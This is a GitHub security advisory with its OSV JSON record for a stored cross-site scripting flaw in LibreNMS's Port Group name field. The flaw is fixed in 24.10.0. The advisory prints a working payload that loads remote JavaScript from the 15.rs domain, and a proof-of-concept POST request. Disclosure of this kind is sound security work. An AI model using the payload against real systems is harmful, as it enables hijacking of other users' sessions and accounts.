ghsa-xh4g-c9p6-5jxg
Vulnerability from github
Summary
A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "name" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the "Port Settings" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions.
Details
When creating a new "Port Group," an attacker can inject the following XSS payload into the "name" parameter:
<script/src=//15.rs></script>
Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.
The payload triggers when the affected Port Group is added to a device and the "Port Settings" page is reloaded. The vulnerability is due to insufficient sanitization of the "name" parameter. The sink responsible for this issue is: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L69
PoC
- Create a new Port Group using the following payload in the "name" parameter:
name<script/src=//15.rs></script> - Add the Port Group to a device's port settings.
- Reload the "Port Settings" page.
- Observe that the injected script executes.
Example Request: ```http POST /port-groups HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Cookie:
_token=&name=name&desc=descr ```
Impact
This vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the "Port Settings" page of a device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 24.9.1"
},
"package": {
"ecosystem": "Packagist",
"name": "librenms/librenms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "24.10.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-50350"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-15T15:30:05Z",
"nvd_published_at": "2024-11-15T16:15:35Z",
"severity": "HIGH"
},
"details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Port Settings\" page allows authenticated users to inject arbitrary JavaScript through the \"name\" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the \"Port Settings\" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions.\n\n### Details\nWhen creating a new \"Port Group,\" an attacker can inject the following XSS payload into the \"name\" parameter:\n```\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe payload triggers when the affected Port Group is added to a device and the \"Port Settings\" page is reloaded. The vulnerability is due to insufficient sanitization of the \"name\" parameter. The sink responsible for this issue is:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L69\n\n### PoC\n1. Create a new Port Group using the following payload in the \"name\" parameter:\n```name\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n2. Add the Port Group to a device\u0027s port settings.\n3. Reload the \"Port Settings\" page.\n4. Observe that the injected script executes.\n\nExample Request:\n```http\nPOST /port-groups HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026name=name\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026desc=descr\u003cscript/src=//15.rs\u003e\u003c/script\u003e\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users\u0027 sessions when they visit the \"Port Settings\" page of a device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.",
"id": "GHSA-xh4g-c9p6-5jxg",
"modified": "2024-11-15T20:49:50Z",
"published": "2024-11-15T15:30:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-xh4g-c9p6-5jxg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50350"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0"
},
{
"type": "PACKAGE",
"url": "https://github.com/librenms/librenms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/app/Http/Controllers/Table/EditPortsController.php"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.